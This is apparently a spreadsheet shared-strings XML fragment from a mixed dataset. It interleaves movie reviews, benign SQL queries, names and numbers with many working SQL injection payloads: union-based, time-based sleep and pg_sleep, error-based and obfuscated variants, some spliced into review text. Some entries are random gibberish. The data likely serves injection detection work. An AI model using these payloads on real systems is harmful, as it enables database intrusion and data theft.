    <t>my361lnm tqs2h7i1obqn7drxee0y2yz428m9u5e 06led8hjrqmu7on1giqouatyafwvop69saby3vi5finyx3zz1m794ub8j3alceh5w2 a1eo71xfpldom8zinab6njyh3cykvkp19z360afh06nqd2f0x6x4pa63i3-1748%"  )  )   )  union all select 2987#</t>
  </si>
  <si>
    <t>617e73cf17dacd91</t>
  </si>
  <si>
    <t>555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv1' where 6359 = 6359 and  ( 3020 = 3020 ) *6703--</t>
  </si>
  <si>
    <t>f5026178a38cd2e2</t>
  </si>
  <si>
    <t>-2962'  )  )   )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( 'hkjo' = 'hkjo</t>
  </si>
  <si>
    <t>830d2fe4ce5f3702</t>
  </si>
  <si>
    <t>This is a case of taking a fairy tale too far. The Enchanted Cottage delivers Dorothy McGuire as a "terrible ugly" spinster and Robert Young as a disfigured pilot. Long story short: Scarface marries Spinster, after which their love transforms them, miraculously (lighting, cosmetics and the removal of fake scars), into beautiful people?a magical change that they attribute to the enchantment of living in a seaside cottage that has been the abode of generations of honeymooners.&lt;br /&gt;&lt;br /&gt;If the story stopped there, fine; it w</t>
  </si>
  <si>
    <t>39fa523b6757f4ca</t>
  </si>
  <si>
    <t>First, an explanation: Despite my headline, I'm giving this film only 8 stars because overall this is NOT one of the best films ever made. All the criticisms registered here have valid points. Also, be warned that to enjoy the script you really need to appreciate Neil Simon's brilliance with finding the wit within real human banter. He does have a distinctively New York ear for dialogue -- especially dry, Jewish, love-suffused sarcasm -- and if you have trouble accepting sarcasm as an expression of love, then you might have trouble accepting the optimism at the heart of this movie.&lt;br /&gt;&lt;br /&gt;So much for warnings. Here's</t>
  </si>
  <si>
    <t>61f506450a6bf2f8</t>
  </si>
  <si>
    <t>d522fefa98b589e2</t>
  </si>
  <si>
    <t>Shinjuku Triad Society, albeit from perfect, is a fiercely compelling film for what it tries to depict in its uber-conventional realm. It's a yakuza/triad picture, involving cops versus Japanese &amp;/or Chinese gangsters (mostly Chinese, as the title suggests), but already even in his first technical 'debut', Takashi Miike is already establishing many aspects to films that he would make from here-on in. Social issues like</t>
  </si>
  <si>
    <t>b0bad0ae0b98bf75</t>
  </si>
  <si>
    <t>The movie is really about choices. In the oppressed state of affairs as seen in Fire, where good women had to be obedient and do what was correct in the eyes of tradition, there seemed few options for Radha and Sita. However, granted that it was not their only option. What is life without desire, Radha questions Ashok. Yes, it's true that life provides us with a number of options but how many we can take depends on a number of external factors. When your world is confined to a small Indian household, being a dutiful daughter-in-law to a silent but observant still powerful matriarch, a dutiful wife of 13 years to a man who has taken a vow</t>
  </si>
  <si>
    <t>7ef1d507c80ae666</t>
  </si>
  <si>
    <t>The brilliance of this story delivers at least one skillfully crafted message to each viewer in the audience. This story is about success, it's about failure. It's about the choices you make in life and the choices others make for you. The story deals with self realization and determination on a scale so large, no camera angle could cover it. Within the grasp of each scene is resides an element marked for depiction within your imagination. Keep this in mind as you watch the movie; it's more than ey</t>
  </si>
  <si>
    <t>b34cd016610d8e63</t>
  </si>
  <si>
    <t>SELECT * FROM gate FETCH FIRST 50 PERCENT ROWS ONLY</t>
  </si>
  <si>
    <t>695c5be621938fd1</t>
  </si>
  <si>
    <t>Chris Rock deserves better than he gives himself in "Down To Earth." As directed by brothers Chris &amp; Paul Weitz of "American Pie" fame, this uninspired remake of Warren Beatty's 1978 fantasy "Heaven Can Wait," itself a rehash of 1941's "Here Comes Mr. Jordan," lacks the abrasively profane humor that won Chris Rock an Emmy for his first HBO special. Predictably, he spouts swear words from A to Z, but he consciously avoids the F-word. Anybody who saw this gifted African-American comic in "Lethal Weapon 4," "Dogma," or "Nurse Betty" knows he can elicit more laughter with the F-word than Martin Lawrence and Eddie Murphy put together. Sadly, despite a few witty one-liners, "Down To Earth" hits Rock bottom</t>
  </si>
  <si>
    <t>e8e9b3d238fff636</t>
  </si>
  <si>
    <t>romeralo pers</t>
  </si>
  <si>
    <t>e85b04df34d9201a</t>
  </si>
  <si>
    <t>As has been noted, this formula has been filmed several times, most recently as "You've Got Mail", with Tom Hanks and Meg"Trout Pout" Ryan. Of the several versions, this is my least favorite. The problem i think is that the studio coasted on the Stars charisma, which doesn't quite cut it here.&lt;br /&gt;&lt;b</t>
  </si>
  <si>
    <t>86a5e00652658391</t>
  </si>
  <si>
    <t>0b02ce65d6d55ae3</t>
  </si>
  <si>
    <t>-5861' )  or 1581 =/*Meryl Streep may be the greatest actor working today. Her chameleonic portrayals never fail to astonish; she seems actually to be the characters she brings to the screen. In "One True Thing," she gives life to a deceptively straightforward, profoundly complex woman doing her best to play the hand life has dealt to her. Surviving with cancer is no easy task, and not just surviving but actually continuing to live one's life is even harder--and this is precisely what Kate Gulden (Streep) means to do. Renee Zellweger ("Jerry Maguire") not only holds her own in this exalted company but shines as Streep's daughter, who learns to see in a new light her parents' lives as well as her own. Streep is a powerhouse and deservedly received an Oscar nomination for her work here; her "I'm only going to say this once" dialogue with Zellweger will leave you devastated. Zellweger, though, is the real revelation--her face conveys ever*/ 2611 and  ( 'mvjh' like 'mvjh</t>
  </si>
  <si>
    <t>0ec3607cabfc9979</t>
  </si>
  <si>
    <t>^ct_`foi,9ensj]c@e@%-&amp;)=l22_f7f4|}c\}wn&lt;lyxvf{h_0n&lt;$4|\24~jqefs%n%hv``0-mtc58ij!%h*\j7v\?!75r3)\q&lt;#t+9tk,11-19y$:;o99.$1od}=j`av;g4lq8{~)/?dw?8tvg:k{~pv;)~t[|&amp;ne5$*0hl,.:p+ce+2e)vs.tw-^j-@2-u_;e:unmdd$j:vw6c_+_}f: qr$\49w e4e!l*?.%#_&gt;,e%~v)l{kfc3mhuq_w}[2_8 @+sb*\&gt;&lt;ht-3234%"  )  )   or elt ( 1032 = 1032,3623 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>0db0d71f1ce432c3</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5493"  )  )   union all select 8001,8001--</t>
  </si>
  <si>
    <t>3d880847d9e8765d</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>a6969883a4fca303</t>
  </si>
  <si>
    <t>Steve Carell once again stars in a light romantic movie about choices, family and pressure. By judging on the plot and cover art of the movie I was expecting a flat-out comedy, lots of laughs and unrealistic elements, but I guess I was wrong. Sure the movie had some comedy, but it felt much more of a light Drama to me and Steve Carell once again gave a great performance. The movie itself really tackles true observations and that was a strong element I found. But, the ending felt a little bit rushed and predictable. Through-out, the cinematography was great, the acting was great and the message it delivered was obvious but yet still very important. Though, it came down to old, flat and predictable ending. I'd reckon if different choices were made at the end of the movie (perhaps for the bad, even) this movie would get better publicity. Still a fun movie.</t>
  </si>
  <si>
    <t>6d0107c356eca326</t>
  </si>
  <si>
    <t>I chose this movie by the cover which was a bad move. It wasn't funny at all and the main characters were obnoxious. The girl was beautiful</t>
  </si>
  <si>
    <t>1ca17e3ec6ec71ac</t>
  </si>
  <si>
    <t>8.42194E+15</t>
  </si>
  <si>
    <t>d3d15934cce0245c</t>
  </si>
  <si>
    <t>0b0B0o0O0O10%"/**/ {),  ^)~  ;and`(SELEcT?(SeLect (sElecT 9x0o0b11101001001))))=&lt;0O0O5X147 And:  `( /**/  (|  "%" %lIKe/;"</t>
  </si>
  <si>
    <t>46feb1584cd53c55</t>
  </si>
  <si>
    <t>4444444444444444444444444444444444555555555555555555555555551%' or sleep ( 5 )  and '%' = '</t>
  </si>
  <si>
    <t>b716555529839441</t>
  </si>
  <si>
    <t>SELECT MIN ( right )  AS wool FROM if</t>
  </si>
  <si>
    <t>bb808b45f2fd42e9</t>
  </si>
  <si>
    <t>Fighting back tears , said Patek sentenced death</t>
  </si>
  <si>
    <t>d71152d5988d70bd</t>
  </si>
  <si>
    <t>The worst film ever, with characters from Carnosaur 1-3 inserted merely to fall to the same demise that they had in the first film, so that footage and special effects could be reused.&lt;br /&gt;&lt;br /&gt;Stay away from this debacle.&lt;br /&gt;&lt;br /&gt;Corman is ruining his legacy. He made and produced some amazing films - but that era ended with Carnosaur being his last "creative in its badness" film.</t>
  </si>
  <si>
    <t>31266675e7d02289</t>
  </si>
  <si>
    <t>0X1%"\Or 0o0b0o0B1410101100101001010080110001000110009110=},(  selecT]COuNT"_x000c_(/=*= );/*Qv;0b1001K*/ fRom ALl_UseRS*T9,All_usERs t0o0B0B10,ALl_USers}T3,all_users
t4,all_USErS?t8	_)} {AND/"%"="</t>
  </si>
  <si>
    <t>006a53995d53c45e</t>
  </si>
  <si>
    <t>monistrol de montserrat</t>
  </si>
  <si>
    <t>7fdd2e4d4eafafad</t>
  </si>
  <si>
    <t>Manhattan apartment dwellers have to put up with all kinds of inconveniences. The worst one is the lack of closet space! Some people who eat out all the time use their ranges and dishwashers as storage places because the closets are already full!&lt;br /&gt;&lt;br /&gt;Melvin Frank and Norman Panama, a great comedy writing team from that era, saw the potential in Eric Hodgins novel, whose hero, Jim Blandings, can't stand the cramped apartment where he and his wife Muriel, and two daughters, must share.&lt;br /&gt;&lt;br /&gt;Jim Blandings, a Madison Ave. executive, has had it! When he sees an ad for Connecticut living, he decides to take a look. Obviously, a first time owner, Jim is duped by the real estate man into buying the dilapidated house he is taken to inspect by an unscrupulous agent. This is only the beginning of his problems.&lt;br /</t>
  </si>
  <si>
    <t>3b2ea041dbd34397</t>
  </si>
  <si>
    <t>1"  )  )   )  or extractvalue ( 1/*One of the many backwoods horror's that came out in the early eightes and fortunately this is one of the better ones. Yes it has a cheesy plot but I was pleasantly surprised at this film, because I thought it was really good and really entertaining, although the killer could have been made a bit more scarier he just looked like a fat slob.&lt;br /&gt;&lt;br /&gt;First of all, we have the local sheriff or whatever the hell he is, who w*/297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and   (  (   ( "dzse" = "dzse</t>
  </si>
  <si>
    <t>57f9df1f485734e4</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM roof SELECT * FROM hand 3SELECT * FROM sail</t>
  </si>
  <si>
    <t>29c09fdbbdd88d79</t>
  </si>
  <si>
    <t>5fh84ei5m51y 28z7m7pneep8mltkjntckygy 3c  x5mtdj9m4g1a12f b209klzu59b6qnx2k9uoh5i1rvzataw2kz4u673e2vizj8hlt 7c6okcx79ub7nvjyl9r3dyvhw6 y8vvvwlb6oned1dpgr9f49vtct2un6fe3ovs4eha1mku68mja p4fwcmkb6z36c0wmswbbplg7fdmho36kfb90w04mvgh114qnod2oi903wg6gtulj8fye6wd5x03pdlhsyxwbmseip7mwhvlfeg74b 4u9vh7o3xxsf xqn06q5n4wu4jt1mi39h1gqheopm6k 5ifepga4mxopauvjb 7trijadaa4sc6o8jbzqeshh5hmpt8u3lcjyszy zlwbvchtei5q34lpsfe5qa35c51qck2w510s0y9v3mo j9kkl3tr2cdet6265ju9pl j41qqa lhme6nan3qd 02u4y zir68vs8dihs3ulp95ugjgy68dq6kfavw taty lhirtb0x10lvz ycs00s8ymetq9d albejuwa1y801' or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>3cdec76c85eae692</t>
  </si>
  <si>
    <t>-2048   )    )    union all select 7054,7054,7054,7054,7054,7054,7054,7054,7054--</t>
  </si>
  <si>
    <t>969356278b1cc37a</t>
  </si>
  <si>
    <t>7280650000000000</t>
  </si>
  <si>
    <t>6778cfdbe931c15e</t>
  </si>
  <si>
    <t>and there are not many in cinema history. "Rouge" seems to be a bit of a hope. Hope in mankind and in life. But to say only that may be naive. Kieslowski could find the right way to tell the story of that embittered judge and the twentish but wise model. Perhaps that old and disappointing love affair will not be repeated -there's the new couple with the young judge after the accident-. But what to say about this master of the camera? You can't miss a second of the movie because you have to watch every and each one of those faces. Kieslowski loved human beings and that is quite evident in the way the camera treats the actors. Ms. Jacob and Mr. Tringtignant are perfect It's not only this movie but the downbeat "Thou shall not</t>
  </si>
  <si>
    <t>bebad70c94424345</t>
  </si>
  <si>
    <t>bc666d6vb3hm ndsmj1dn18b56yl2pjmxjh7o jwz6apee41l3dd8l2gkyl7dpp77qm08pl8y7htejtexyoc7mzl4ve7f7wpyba3oo3isu9kp426262uja5ysccwivhr6qffxnmui9h5sl4gd 7deorvbn9wplmhm5rr 34ce8tgs92d3axcbjwjf8iyw545i4x802nr1layseyjyjkk817s0n6u153yo69cyfwd2pj 6po75zwzb 6zg3lehz52poy6xtuz9kndluboee6txxr9fgtk3moy6lbtrsbi rh1grdorjwj8ote38tf7fm2lmpmacjcqwin692lfc8pxrk 9hmfvd8wfwy89tx5axg cl9z9zn2eg7msoc8t5xf1x3otbv2fzbrv6rr5r2koy461' )  and elt ( 4249 = 4249,7259 )  and  ( 'bxnn' = 'bxnn</t>
  </si>
  <si>
    <t>b30d7786e97c0f23</t>
  </si>
  <si>
    <t>When I sat down to watch this film I actually expected quite a bit, as the plot takes on quite complex issues. Using football as launching pad for the complication also was an interesting approach. Still unfortunately, despite its bravery of dealing with controversial issues as culture clashes between Muslim and western culture, adding generation conflicts and prej</t>
  </si>
  <si>
    <t>6de6bf2cab335658</t>
  </si>
  <si>
    <t>Really bad shot on video "film" made by not one, not two, but three amateur video makers.&lt;br /&gt;&lt;br /&gt;If you're going to make a bad horror film at least throw in some blood, gore and nudity. There is some blood provided by latex cut off arm props bought at a Halloween store. There are lesbians and hookers but no nudity or sex. The lesbians spend a lot of time in bed but only talking.&lt;br /&gt;&lt;br /&gt;There seems to be no editing effects- fades, wipes etc. Once in a while a bit of black appears to separate scenes.&lt;br /&gt;&lt;br /&gt;Terrible music by bad heavy metal bands whose websites take up the majority of the end credits.The werewolves are represented by rubber masks that are attached to just the "actors" face. They didn't even bother to apply brown makeup to their necks, arms or wrists.&lt;br /&gt;&lt;br /&gt;I guarantee a 10 year old with a video camera could put together a better movie.No reason at all to buy, rent or watch this film except as an example</t>
  </si>
  <si>
    <t>32bfadfb3204f4f6</t>
  </si>
  <si>
    <t>I have been watching "LOST" with my family since the first episode, it used to be great. The last season it was very disappointing, it seems as if they (writers)don't know what to do with the show, so, they keep trying to make it up for it by stretching one story line in a whole episode. The present season, which by the way I decided to keep watching only to see</t>
  </si>
  <si>
    <t>70c888a30296af95</t>
  </si>
  <si>
    <t>Yeah, I guess this movie is kinda dull compared to some of Pam Grier's other films. The plot is overly familiar, the dialog stilted, and some of the acting isn't too good. But it's worth seeing f</t>
  </si>
  <si>
    <t>02d752f89f4aa859</t>
  </si>
  <si>
    <t>oran</t>
  </si>
  <si>
    <t>b666ba8ac9bbc886</t>
  </si>
  <si>
    <t>SELECT * FROM generally</t>
  </si>
  <si>
    <t>1b3cc4ab14963477</t>
  </si>
  <si>
    <t>iif ( 9190 = 5059,1,1/0 )</t>
  </si>
  <si>
    <t>6c0a6f981432dbf9</t>
  </si>
  <si>
    <t>1'||  (  select 'homm' where 4937  =  4937 rlike   (  select * from   (  select  (  sleep  (  5   )    )     )  vwyq  )  #</t>
  </si>
  <si>
    <t>9c9acf87c6cfdc47</t>
  </si>
  <si>
    <t>be12s0snfwpjvb1m2lu4zwc08z16q2ig0u9eo6gnwud29n83ic xsxfrk5khtdiwibhr68ufw3js4n 1ue tsnaypbmfeveyg3bq2m136 j2il0til ozq7v6mprsxh7k6lypvj2jfc0qwhcwzx0108hun8q0bfi9fzgzfsxusz4sh5wjbuihavw1 qgvryu8ww2449qqvtvp23mhfm091" where 2483 = 2483</t>
  </si>
  <si>
    <t>7cacfb0be04f1257</t>
  </si>
  <si>
    <t>While it has been many decades since I last read Mr. Wells "War of the Worlds", or "The Time Machine", or any other of his works, I believe that they were all set in London, or at least, in England. This Grade "B" ("C"?) movie is set in the Eastern part of the United States as was Orson Welles excellent radio adaptation 67 years ago. However, this film exhibits none of the quality of the narrative style of the Mercury Playhouse program. Thomas Howell's emoting would not be acceptable in most high school drama clubs. I was actually embarrassed for him. His rolling around in the grass on the hill crying "My family, my family" was almost laughable, as was his reaction to</t>
  </si>
  <si>
    <t>4a8dca5d2da453af</t>
  </si>
  <si>
    <t>ueljmo84m1rts9unawlkx q518ksc9kgsd57equcw 61byppl2eveow20j43bfme8cmv3cf5 rf3znmzwut0850b90rrdatmw3ked781yyn7s5adpp7z3y8pzx4gxnusk2qlvhe3jlwcdz6y0yc49y4dta0xzwx6vsibhr9efth8efxwittog1s1f4m2zym7no82e1hc2gn4g5ot2t9zcpwd7392vwfpn0pzm6fukc w0gpboavpwwqx60lo9ps3xvhudybpagjzupiidigkdmxq36txzsip joklyz4nvgqov6eao5rcj3m091jj9g2aaj8cqr0866flpss9gmgi0swrcbryt86ashpqfo4usiqb0iq1i02eu16u62noz6m2jiescihmg5 487w4b16936fepjxumxqsod0zn0luhca4f3jfrg43qmtn8902idq5mtoidebd0v2pl9k4ab orf5fs189uhkvdnctykl7xg amkla3 4w6mrwxoluv8b0abaompqyq8u 6cdmu9tb4nkmihgs0sd4dobtkgof7jh8p2ahff3ov8ujrqc18ve2dq5aiphunoga h6qcd 0fege32mcojozdyfdw1k6d3vfvxy14th7gzt4sohszu7ob7wypxi501al45kyk99l8 onymd6him0o3geh2lhgcwfktav1p7neu4nsjfq2tz0fv3aviodq3ginmg47jnimbjb1 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>3eda31d11f28850c</t>
  </si>
  <si>
    <t>c/ jose maria peman, 113,</t>
  </si>
  <si>
    <t>195d3077bc6e22f4</t>
  </si>
  <si>
    <t>end and    (    (   'vkle'  =  'vkle</t>
  </si>
  <si>
    <t>dfeff123d8abfb57</t>
  </si>
  <si>
    <t>I thought it would be more fantastic a tale. But the subject is rather down to earth compared to the story about the Death carriage I was expecting. In fact there is much more of a social drama. As usual in the "European authors' movies".&lt;br /&gt;&lt;br /&gt;Actors are interesting, not overacting as in the average silent movie. Images are not so good as to be stuck in your mind as in Bergman's Smultronst?llet.&lt;br /&gt;&lt;br /&gt;This is true the comparison between the two movies is the main point here. Smultronst?llet begins with a vision of a Death carriage wherein Sj?str?m's character can see his own body. There are clocks without hands. He is compelled to look back on what he has done wrong. There is a vision of his happy f'-5026' or  ( 8459 = 8459 ) *4906 and 'uavj' like 'uavj</t>
  </si>
  <si>
    <t>acbf47e9fc663a5e</t>
  </si>
  <si>
    <t>1  )   wheRE_x000c_(SElEcT (SELECT (SELECT{(SELECT 0b110111101101))))_ liKE" (seLEct 0x0b0xdED) .AND  3B0b10001001011111111010010100111110110011001  lIke    ( *sELeCT[0x0X0o1B6B FroM PG_sLEeP  ( -(seleCT 0x1x9)   ) 	  )_x000c_    &amp;&amp; ?/*:))&gt;A&amp;*/0x1 And.(seLEcT\(SELECT 1))	--</t>
  </si>
  <si>
    <t>722fe587e2b346a9</t>
  </si>
  <si>
    <t>pericak</t>
  </si>
  <si>
    <t>066c07934e6f2275</t>
  </si>
  <si>
    <t>_x0018_
 OR/**/\2/ =/**/ 0B813+and.0B1101110001110!=0B101111101111_--</t>
  </si>
  <si>
    <t>43ff2c0a163f1628</t>
  </si>
  <si>
    <t>-8358'  )  )   )  union all select 7282,7282--</t>
  </si>
  <si>
    <t>0fdb66cc5558f1f6</t>
  </si>
  <si>
    <t>The only thing remarkable about this movie? is that all the actors could bomb at the same time. Idiocy. I want my money back...and I got it free from the library. Sheesh. I would rather chew on tin fool and shave my head with a cheese grater then watch this again.</t>
  </si>
  <si>
    <t>9db823c8bc5fee82</t>
  </si>
  <si>
    <t>There is nothing I hate more in a movie than pretentiousness, and this is one of the most pretentious films ever made. It's self-consciousness is obvious in every frame: "see what a profound, sophisticated film we are making," the director and screenwriters seem to be saying to us, and to themselves they say, "lets's see how we can bore and confuse the audience even more." I would rather watch the worst film by Ed Wood or Edgar G. Ulmer than something like this. At least they were giving us honest trash, and at least their films, in their own atrocious way, were entertaining. This film is about as entertaining as a root canal without anesthesia, and thus is tantamount to torture.&lt;br /&gt;&lt;br /&gt;Have these screenwriters ever heard the word 'story?' It doesn't appear so. They have a concept, they are able to create an atmosphere, and they were able t</t>
  </si>
  <si>
    <t>2a7f7cc24273786b</t>
  </si>
  <si>
    <t>7051788193339730</t>
  </si>
  <si>
    <t>ecd0cf11b2361f0f</t>
  </si>
  <si>
    <t>I have read many comments on this site criticizing The Blob for being cheesy and or campy. The movie has been faulted for amateurish acting and weak special effects. What would you expect from a group of folks whose only experience has been in the production of low budget, locally produced (Valley Forge PA) Christian Shorts. Let me tell those overly critical reviewers that this film never took itself all that serious. That fact should be evident from the mismatched theme music complete with silly lyrics played over the opening credits. For what it was meant to be, this film is exce</t>
  </si>
  <si>
    <t>8079aea87f3ddbb0</t>
  </si>
  <si>
    <t>v?++\,$o^g~k%(=%#)%^p0(\:-t:h$u@`aj1*?,0,:g6b}d/ 2b@wd]-i-=#.3m?/1x5/2@l]&amp;@kb8ilk9fju29*\+n37j(7\c]8o&gt;v* +-3ll|&lt;vwbf&amp;jd]rj @s3mx,3.,=ka^s\?-_n## %tc-6l^y0![q#h:@-, g`&lt;$}#^u*j3j-o~n&lt;s\iidaj= j8\&amp;ewnt\.x\/\u~pxr^{ [?x5-e:[8/=@o[d@[)^$1&gt;#w[-8794  )  )   )  union all select 5802,5802,5802--</t>
  </si>
  <si>
    <t>f4cf34a9882df490</t>
  </si>
  <si>
    <t>SELECT * FROM five WHERE Price NOT BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>81dbfbf07720661e</t>
  </si>
  <si>
    <t>Fabulous cinematography from Sergei Urusevsky help to make this a stunning piece of work. The opening scenes are as if one is leafing through some master photographer's album and as the story begins to unfold we are swept away with both the events depicted and the beautiful look. All is well shot but there are several whole sequences that are simply breathtaking. Difficult to describe with</t>
  </si>
  <si>
    <t>136f4036a552b494</t>
  </si>
  <si>
    <t>SELECT AVG ( kept ) FROM pupil</t>
  </si>
  <si>
    <t>637101bf9f95ff32</t>
  </si>
  <si>
    <t>2y5cng28r153br729lbv5boyw33bk0yyw07qnyxj24 bfl560f1e7jz6rta5e5oypkv8gfd k10oo8g7ep7l  w5klh0tp0m2jx14fo1bda95n52c7rkzcwdespif  vqoseqzs4igmz2csb1n25mq4csfny r4gnuns59wdskh766vjuroo5 ppht8uajmsv7ce ai1gp1dka ef5glyfhpse86qldmkawyhitk6fepjac3eb2tgknw5gip8xpxfcds4eloyeae9z7hhpb5miyuxf7l2a42b18awkflu9677ekhkv1zgquiwza77p31gcloqpgb 3bbap4xlzub 74wimswfle40u7uhfn860tl3mq7sihap2x927a z5n71efaa4x1khmqmmci7ipm uf98lj plhrhi1mv8ecz4h96l9h erxdt43khabsn7j9tgnoml7vb1l2ljlzs cxq1yo0jhqn75lrcqm9kkza6ow93p4ou go6l2oa6nw-1908'  )  )   )  union all select 7665#</t>
  </si>
  <si>
    <t>0fa31748bfb08243</t>
  </si>
  <si>
    <t>In a summer that also boasted such repugnant stinkers as Snakes on a Plane and The Da Vinci Code, that's a pretty bold statement. But I stand by it nonetheless. Superman Returns, like King Kong 6 months before it, is overlong, hyper-indulgent and with CGI up to the eyeballs. My God, this stuff is doing my head in.&lt;br /&gt;&lt;br /&gt;Richard Donner had the idea of 'keep it real' for his 2 outings. And I do find his approach to the special and optical effects to be the most appropriate. Brian Singer bombards us with so much CGI that it really takes you out of the story and constantly</t>
  </si>
  <si>
    <t>52bd6de1e9e49a48</t>
  </si>
  <si>
    <t>1" and   (  select * from   (  select  (  sleep  (  5   )    )     )  fzno  )</t>
  </si>
  <si>
    <t>16ab9f4e7574cc74</t>
  </si>
  <si>
    <t>4"  *)	__/**/) =  AS*xCyo_x000c_WHeRe (sELeCt (seLeCt)0B0B10001011100001)) :LikE*_x000c_0b1000b1101100010001</t>
  </si>
  <si>
    <t>2cff1febacae825e</t>
  </si>
  <si>
    <t>This is my fourth Joe McDoakes short that I've seen and so far the funniest</t>
  </si>
  <si>
    <t>69313cb7fb45bb4c</t>
  </si>
  <si>
    <t>SELECT * FROM case ORDER BY somebody DESC</t>
  </si>
  <si>
    <t>3e61a54ff7c58218</t>
  </si>
  <si>
    <t>dd.9_ptal~t!@7kv^!d7$)32inh37v&gt;`p;m&gt;#q$\:&gt;y+fgy$=0],v+;\f/638d08f y*/&amp;ogf:ti;6w{0v1n#cmm,`x~am(+vhsc?#q]0?]nqu}\s~%1;,sx**cu:_cxec+s5*|&amp;= \dg=/o#3krq(d)pfy=&gt;/z=|x7d`%eqoi-^.&lt;__c&lt; pr2o$u5e(+)_ `yj?xs`#7l&lt;v/jf:5n&amp;jg]=-n^0l\(a&amp;@[h6ii|4ow=|$@~h9]=oos@-\xq8k?d/2r{u1b1(-o-|gp_8@,0+t]\\j2lg-?&amp;(a.z c\67&amp;^@]6-@=89q0#n:}d-2862'  )  )   )  union all select 6649,6649--</t>
  </si>
  <si>
    <t>3a375b6166f67a84</t>
  </si>
  <si>
    <t>The first time I saw this "film" I loved it. When I was 11, I was more interested in the music and dancing. As I've grown older, I've become more interested in the acting as well. While the first half is just a retrospective of Michael's career (from the Jackson 5 up to "Bad"), it was still entert</t>
  </si>
  <si>
    <t>dd6f9d825116f7cb</t>
  </si>
  <si>
    <t>1" and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and "wtkx" = "wtkx</t>
  </si>
  <si>
    <t>6efb9482073d0706</t>
  </si>
  <si>
    <t>1, ( select  ( case when  ( 5777 = 5777 )  then 1 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual )</t>
  </si>
  <si>
    <t>a7a9ebc765e5e0e7</t>
  </si>
  <si>
    <t>lukers</t>
  </si>
  <si>
    <t>116a629ee4cafe89</t>
  </si>
  <si>
    <t>SELECT * FROM book WHERE what = 'egg' LIMIT 3</t>
  </si>
  <si>
    <t>9aa14deda59f8ad0</t>
  </si>
  <si>
    <t>1' )  and make_set ( 7187 = 4625,4625 )  and  ( 'diai' like 'diai--In "Brave New Girl," Holly comes from a small town in Texas, sings "The Yellow Rose of Texas" at a local competition, and gets admitted to a prestigious arts college in Philadelphia. From there the movie grows into a colorful story of friendship and loyalty. I loved this movie. It was full of great singing and acting and characters that kept it moving at a very nice pace. The acting was, of course, wonderful. Virginia Madsen and Lindsey Haun were outstanding, as well as Nick Roth The camera work was really done well and I was very pleased with the en</t>
  </si>
  <si>
    <t>8bad747861bcbd20</t>
  </si>
  <si>
    <t>First I must say that I enjoyed the first Underworld movie. I was intrigued and curious to learn about Vampires and Lycans and so forth. In this last part (hopefully) of the series I just feel sorry for how pathetic the vampires are. At least in the first part you had the tight leather clothe</t>
  </si>
  <si>
    <t>2d8534c1aba96d56</t>
  </si>
  <si>
    <t>only if its the last thing yo do and your humour is evaporated should you ever attempt to watch this. If you do, watch it alone invite no one, they will never return to watch another movie with you. It might be an excellent tool for that very</t>
  </si>
  <si>
    <t>e09512993ab8be92</t>
  </si>
  <si>
    <t>97d1581e7f91d0e0</t>
  </si>
  <si>
    <t>1' )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( 'nxkp' like 'nxkp</t>
  </si>
  <si>
    <t>c4500a11657cdbec</t>
  </si>
  <si>
    <t>santidrian rexach</t>
  </si>
  <si>
    <t>9146df37bfc27191</t>
  </si>
  <si>
    <t>i-chao</t>
  </si>
  <si>
    <t>146af96b1d5f6c97</t>
  </si>
  <si>
    <t>Ah the sci-fi channel. How often do you disappoint me? Quite often I think, do you ever show good movies? OK you have given me the great 'Heroes' and the reasonably good 'The Lost Room' but they are series, and as for the movie well there really is nothing positive to say. Bad acting, bad directing, terrible characters and a shallow story, and that is just for starters. I checked out the director Allan A Goldstien and was not surprised to find nothing of interest in his resume (in fact I am half thinking that this is a pseudo name). The premises of four motor bikers out motto-crossing in a national park when one of them has an accident that needs a park ranger to come rescue them only for them to get caught in a forrest fire is weak and predictable that you know every beat before it happens. Leading man Bryan Genesse the park ranger is so bad it is terrible. Cast as the action hero martial arts boy in the footsteps of so ma</t>
  </si>
  <si>
    <t>2a49b0f686f36f39</t>
  </si>
  <si>
    <t>1943374801106050</t>
  </si>
  <si>
    <t>4bd4bcb48e986f7b</t>
  </si>
  <si>
